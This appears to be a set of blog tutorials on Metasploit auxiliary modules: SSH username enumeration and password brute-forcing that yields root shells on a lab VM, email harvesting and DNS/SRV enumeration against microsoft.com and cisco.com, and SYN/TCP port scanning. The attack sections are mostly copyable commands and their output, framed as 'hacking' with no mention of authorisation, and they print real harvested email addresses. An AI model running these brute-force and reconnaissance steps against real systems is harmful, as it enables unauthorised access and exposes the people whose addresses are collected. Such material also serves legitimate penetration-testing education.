Hacking SSH with Metasploit Auxiliary Modules

Perhaps SSH is another popular services targeted by hackers. So in this post going to show you how to use metasploit modules to dictionary or brute force attack to hack SSH server.

Firstly we need to find the correct users to make the password guessing attack. We can enumerate username with metasploit auxiliary/scanner/ssh/ssh_enumusers module:

msf auxiliary(dns_srv_enum) > use auxiliary/scanner/ssh/ssh_enumusers
msf auxiliary(ssh_enumusers) > show options

Module options (auxiliary/scanner/ssh/ssh_enumusers):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        Use a proxy chain
   RHOSTS                      yes       The target address range or CIDR identifier
   RPORT      22               yes       The target port
   THREADS    1                yes       The number of concurrent threads
   THRESHOLD  10               yes       Amount of seconds needed before a user is considered found
   USER_FILE                   yes       File containing usernames, one per line

msf auxiliary(ssh_enumusers) > set RHOSTS 192.168.67.136
RHOSTS => 192.168.67.136
msf auxiliary(ssh_enumusers) > run
[-] Auxiliary failed: Msf::OptionValidateError The following options failed to validate: USER_FILE.
msf auxiliary(ssh_enumusers) > set USER_FILE /root/Desktop/users
USER_FILE => /root/Desktop/users
msf auxiliary(ssh_enumusers) > run

[*] 192.168.67.136:22 - SSH - Checking for false positives
[*] 192.168.67.136:22 - SSH - Starting scan
[+] 192.168.67.136:22 - SSH - User 'root' found
[!] 192.168.67.136:22 - SSH - User 'owaspbroken' not found
[!] 192.168.67.136:22 - SSH - User 'broken' not found
[!] 192.168.67.136:22 - SSH - User 'mag' not found
[!] 192.168.67.136:22 - SSH - User 'admin' not found
[!] 192.168.67.136:22 - SSH - User 'Administrator' not found
[!] 192.168.67.136:22 - SSH - User 'owaspbwa' not found
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssh_enumusers) >


The username 'root' is found . Let's do something else.... thinking... thinking!

Let's find out the version of the SSH for future reference to find exploits:

msf auxiliary(ssh_enumusers) > use auxiliary/scanner/ssh/ssh_version
msf auxiliary(ssh_version) > set RHOSTS 192.168.67.136
RHOSTS => 192.168.67.136
msf auxiliary(ssh_version) > run

[*] 192.168.67.136:22, SSH server version: SSH-2.0-OpenSSH_5.3p1 Debian-3ubuntu4
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed




Well, Now lets guess the password. Always try to have good list of password otherwise it will waste of time. SSH is slow to guess password. Anyway, Here is how we can hack the ssh server:

msf auxiliary(ssh_version) > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > show options

Module options (auxiliary/scanner/ssh/ssh_login):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BLANK_PASSWORDS   false            no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false            no        Add all passwords in the current database to the list
   DB_ALL_USERS      false            no        Add all users in the current database to the list
   PASSWORD                           no        A specific password to authenticate with
   PASS_FILE                          no        File containing passwords, one per line
   RHOSTS                             yes       The target address range or CIDR identifier
   RPORT             22               yes       The target port
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           1                yes       The number of concurrent threads
   USERNAME                           no        A specific username to authenticate as
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false            no        Try the username as the password for all users
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           true             yes       Whether to print output for all attempts

msf auxiliary(ssh_login) > set USER_FILE /root/Desktop/users
USER_FILE => /root/Desktop/users
msf auxiliary(ssh_login) > set USERASS_FILE true
USERASS_FILE => true
msf auxiliary(ssh_login) > set RHOSTS 192.168.67.136
RHOSTS => 192.168.67.136
msf auxiliary(ssh_login) > run

[*] 192.168.67.136:22 SSH - Starting bruteforce
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssh_login) > set PASSWORD owaspbwa
PASSWORD => owaspbwa
msf auxiliary(ssh_login) > run

[*] 192.168.67.136:22 SSH - Starting bruteforce
[+] 192.168.67.136:22 SSH - Success: 'root:owaspbwa' 'uid=0(root) gid=0(root) groups=0(root) Linux owaspbwa 2.6.32-25-generic-pae #44-Ubuntu SMP Fri Sep 17 21:57:48 UTC 2010 i686 GNU/Linux '
[*] Command shell session 1 opened (192.168.67.139:44027 -> 192.168.67.136:22) at 2014-12-17 04:23:57 -0500
[-] 192.168.67.136:22 SSH - Failed: 'owaspbroken:owaspbwa'
[-] 192.168.67.136:22 SSH - Failed: 'broken:owaspbwa'
[-] 192.168.67.136:22 SSH - Failed: 'mag:owaspbwa'
[-] 192.168.67.136:22 SSH - Failed: 'admin:owaspbwa'
[-] 192.168.67.136:22 SSH - Failed: 'Administrator:owaspbwa'
[-] 192.168.67.136:22 SSH - Failed: 'owaspbwa:owaspbwa'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssh_login) > set USERNAME root
USERNAME => root
msf auxiliary(ssh_login) > set PASS_FILE /root/Desktop/users
PASS_FILE => /root/Desktop/users
msf auxiliary(ssh_login) > run

[*] 192.168.67.136:22 SSH - Starting bruteforce
[+] 192.168.67.136:22 SSH - Success: 'root:owaspbwa' 'uid=0(root) gid=0(root) groups=0(root) Linux owaspbwa 2.6.32-25-generic-pae #44-Ubuntu SMP Fri Sep 17 21:57:48 UTC 2010 i686 GNU/Linux '
[*] Command shell session 2 opened (192.168.67.139:43450 -> 192.168.67.136:22) at 2014-12-17 04:25:06 -0500
[-] 192.168.67.136:22 SSH - Failed: 'owaspbroken:owaspbwa'
[-] 192.168.67.136:22 SSH - Failed: 'owaspbroken:root'
[-] 192.168.67.136:22 SSH - Failed: 'owaspbroken:owaspbroken'
[-] 192.168.67.136:22 SSH - Failed: 'owaspbroken:broken'
[-] 192.168.67.136:22 SSH - Failed: 'owaspbroken:mag'
[-] 192.168.67.136:22 SSH - Failed: 'owaspbroken:admin'
[-] 192.168.67.136:22 SSH - Failed: 'owaspbroken:Administrator'
[-] 192.168.67.136:22 SSH - Failed: 'owaspbroken:owaspbwa'
[-] 192.168.67.136:22 SSH - Failed: 'broken:owaspbwa'
[-] 192.168.67.136:22 SSH - Failed: 'broken:root'
[-] 192.168.67.136:22 SSH - Failed: 'broken:owaspbroken'
[-] 192.168.67.136:22 SSH - Failed: 'broken:broken'
[-] 192.168.67.136:22 SSH - Failed: 'broken:mag'
[-] 192.168.67.136:22 SSH - Failed: 'broken:admin'
[-] 192.168.67.136:22 SSH - Failed: 'broken:Administrator'
[-] 192.168.67.136:22 SSH - Failed: 'broken:owaspbwa'
[-] 192.168.67.136:22 SSH - Failed: 'mag:owaspbwa'
[-] 192.168.67.136:22 SSH - Failed: 'mag:root'
[-] 192.168.67.136:22 SSH - Failed: 'mag:owaspbroken'
[-] 192.168.67.136:22 SSH - Failed: 'mag:broken'
[-] 192.168.67.136:22 SSH - Failed: 'mag:mag'
[-] 192.168.67.136:22 SSH - Failed: 'mag:admin'
[-] 192.168.67.136:22 SSH - Failed: 'mag:Administrator'
[-] 192.168.67.136:22 SSH - Failed: 'mag:owaspbwa'
[-] 192.168.67.136:22 SSH - Failed: 'admin:owaspbwa'
[-] 192.168.67.136:22 SSH - Failed: 'admin:root'
[-] 192.168.67.136:22 SSH - Failed: 'admin:owaspbroken'
[-] 192.168.67.136:22 SSH - Failed: 'admin:broken'
[-] 192.168.67.136:22 SSH - Failed: 'admin:mag'
[-] 192.168.67.136:22 SSH - Failed: 'admin:admin'
[-] 192.168.67.136:22 SSH - Failed: 'admin:Administrator'
[-] 192.168.67.136:22 SSH - Failed: 'admin:owaspbwa'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssh_login) >


Let me know if you have questions!

Metasploit Information Gathering Basic[Search for info]

Metasploit is an open source penetration testing framework. Using some metasploit auxiliary  modules we can gather information against our target. Let's see how to do it in simple step to collect emails.

 msf > use auxiliary/gather/search_email_collector
msf auxiliary(search_email_collector) > show options

Module options (auxiliary/gather/search_email_collector):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   DOMAIN                          yes       The domain name to locate email addresses for
   OUTFILE                         no        A filename to store the generated email list
   SEARCH_BING    true             yes       Enable Bing as a backend search engine
   SEARCH_GOOGLE  true             yes       Enable Google as a backend search engine
   SEARCH_YAHOO   true             yes       Enable Yahoo! as a backend search engine

msf auxiliary(search_email_collector) > set DOMAIN microsoft.com
DOMAIN => microsoft.com
msf auxiliary(search_email_collector) > run

[*] Harvesting emails .....
[*] Searching Google for email addresses from microsoft.com
[*] Extracting emails from Google search results...
[*] Searching Bing email addresses from microsoft.com
[*] Extracting emails from Bing search results...
[*] Searching Yahoo for email addresses from microsoft.com
[*] Extracting emails from Yahoo search results...
[*] Located 0 email addresses for microsoft.com
[*] Auxiliary module execution completed
msf auxiliary(search_email_collector) > set DOMAIN cisco.com
DOMAIN => cisco.com
msf auxiliary(search_email_collector) > run

[*] Harvesting emails .....
[*] Searching Google for email addresses from cisco.com
[*] Extracting emails from Google search results...
[*] Searching Bing email addresses from cisco.com
[*] Extracting emails from Bing search results...
[*] Searching Yahoo for email addresses from cisco.com
[*] Extracting emails from Yahoo search results...
[*] Located 2 email addresses for cisco.com
[*]     gsahagun@cisco.com
[*]     vern@cisco.com
[*] Auxiliary module execution completed
msf auxiliary(search_email_collector) >


Microsoft is little scary to post their email address publicly ?

Let's find some DNS information with Metasploit against microsoft:

msf auxiliary(shodan_search) > use auxiliary/gather/dns_info
msf auxiliary(dns_info) > show options

Module options (auxiliary/gather/dns_info):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   DOMAIN                   yes       The target domain name
   NS                       no        Specify the name server to use for queries, otherwise use the system configured DNS Server is used.

msf auxiliary(dns_info) > set DOMAIN microsoft.com
DOMAIN => microsoft.com
msf auxiliary(dns_info) > run

[*] Enumerating microsoft.com
[+] microsoft.com - Address 134.170.188.221 found. Record type: A
[+] microsoft.com - Address 134.170.185.46 found. Record type: A
[+] microsoft.com - Name server ns4.msft.net (208.76.45.53) found. Record type: NS
[+] microsoft.com - Name server ns4.msft.net (2620:0:37::53) found. Record type: NS
[+] microsoft.com - Name server ns1.msft.net (208.84.0.53) found. Record type: NS
[+] microsoft.com - Name server ns1.msft.net (2620:0:30::53) found. Record type: NS
[+] microsoft.com - Name server ns2.msft.net (208.84.2.53) found. Record type: NS
[+] microsoft.com - Name server ns2.msft.net (2620:0:32::53) found. Record type: NS
[+] microsoft.com - Name server ns3.msft.net (193.221.113.53) found. Record type: NS
[+] microsoft.com - Name server ns3.msft.net (2620:0:34::53) found. Record type: NS
[+] microsoft.com - ns1.msft.net (208.84.0.53) found. Record type: SOA
[+] microsoft.com - ns1.msft.net (2620:0:30::53) found. Record type: SOA
[+] microsoft.com - Mail server microsoft-com.mail.protection.outlook.com (207.46.163.170) found. Record type: MX
[+] microsoft.com - Mail server microsoft-com.mail.protection.outlook.com (207.46.163.138) found. Record type: MX
[+] microsoft.com - Mail server microsoft-com.mail.protection.outlook.com (207.46.163.215) found. Record type: MX
[+] microsoft.com - Text info found: v=spf1 include:_spf-a.microsoft.com include:_spf-b.microsoft.com include:_spf-c.microsoft.com include:_spf-ssg-a.microsoft.com include:spf-a.hotmail.com ip4:147.243.128.24 ip4:147.243.128.26 ip4:147.243.128.25 ip4:147.243.1.47 ip4:147.243.1.48 -all . Record type: TXT
[+] microsoft.com - Text info found: FbUF6DbkE+Aw1/wi9xgDi8KVrIIZus5v8L6tbIQZkGrQ/rVQKJi8CjQbBtWtE64ey4NJJwj5J65PIggVYNabdQ== . Record type: TXT
[*] Auxiliary module execution completed
msf auxiliary(dns_info) > 



to find SRV record do the following:

msf auxiliary(dns_info) > use auxiliary/gather/dns_srv_enum
msf auxiliary(dns_srv_enum) > show options

Module options (auxiliary/gather/dns_srv_enum):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   ALL_NS  false            no        Run against all name servers for the given domain.
   DOMAIN                   yes       The target domain name.

msf auxiliary(dns_srv_enum) > set DOMAIN microsoft.com
DOMAIN => microsoft.com
msf auxiliary(dns_srv_enum) > run

[*] Enumerating SRV Records for microsoft.com
[+] Host: sipfed.microsoft.com IP: 131.107.255.86 Service: sipfederationtls Protocol: tcp Port: 5061
[+] Host: sipdog3.microsoft.com IP: 131.107.1.47 Service: xmpp-server Protocol: tcp Port: 5269
[*] Auxiliary module execution completed


Bit lazy to format the text to code. So this might be little hard to read. But I think you still now have basic idea that how you can use metasploit for information gathering. If you like to see more in details or any questions .... you can post comments here.


  

Metasploit Port Scanning

Port Scan is Often done by hackers and penetration tester to identifying and discovering internal services of target host. Port Scanning is an important action for gathering more information of the target host. Today, We will see how to use Metasploit to scan port. Metasploit is a free and open source popular  Exploitation Framework. This Framework widely used by hackers and professional penetration tester. Let's see how we can use Metasploit for basic port scanning.

If you have Kali Linux then Metasploit already installed ! Or download from Rapid7 and install it.


Our Target: http://192.168.67.136/ 


Our First Module is auxiliary/scanner/portscan/syn


Now let's start scanning!
msf > use auxiliary/scanner/portscan/syn
msf auxiliary(syn) > show options

Module options (auxiliary/scanner/portscan/syn):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   BATCHSIZE  256              yes       The number of hosts to scan per set
   INTERFACE                   no        The name of the interface
   PORTS      1-10000          yes       Ports to scan (e.g. 22-25,80,110-900)
   RHOSTS                      yes       The target address range or CIDR identifier
   SNAPLEN    65535            yes       The number of bytes to capture
   THREADS    1                yes       The number of concurrent threads
   TIMEOUT    500              yes       The reply read timeout in milliseconds
Now let's start scanning!
Simply we need to set RHOSTS which is 192.168.67.136 and Port Range 1-65535(Do you really want to scan all port? )

msf auxiliary(syn) > set RHOSTS 192.168.67.136
RHOSTS => 192.168.67.136
msf auxiliary(syn) > set PORTS 80,3306,22,1337
PORTS => 80,3306,22,1337
msf auxiliary(syn) >


Now set interesting ports and execute "run" Command:

 msf auxiliary(syn) > set PORTS 80,3306,22,1337,139
PORTS => 80,3306,22,1337,139
msf auxiliary(syn) > run

[*]  TCP OPEN 192.168.67.136:22
[*]  TCP OPEN 192.168.67.136:80
[*]  TCP OPEN 192.168.67.136:139
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(syn) >


Now let's how auxiliary/scanner/portscan/tcp works:

msf auxiliary(tcp) > set RHOSTS 192.168.67.136
RHOSTS => 192.168.67.136
msf auxiliary(tcp) > set PORTS 80,3306,22,1337,139
PORTS => 80,3306,22,1337,139
msf auxiliary(tcp) > run

[*] 192.168.67.136:139 - TCP OPEN
[*] 192.168.67.136:22 - TCP OPEN
[*] 192.168.67.136:80 - TCP OPEN
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(tcp) >



Really Easy but nmap is best!

More Metasploit Tutorials Coming soon! :)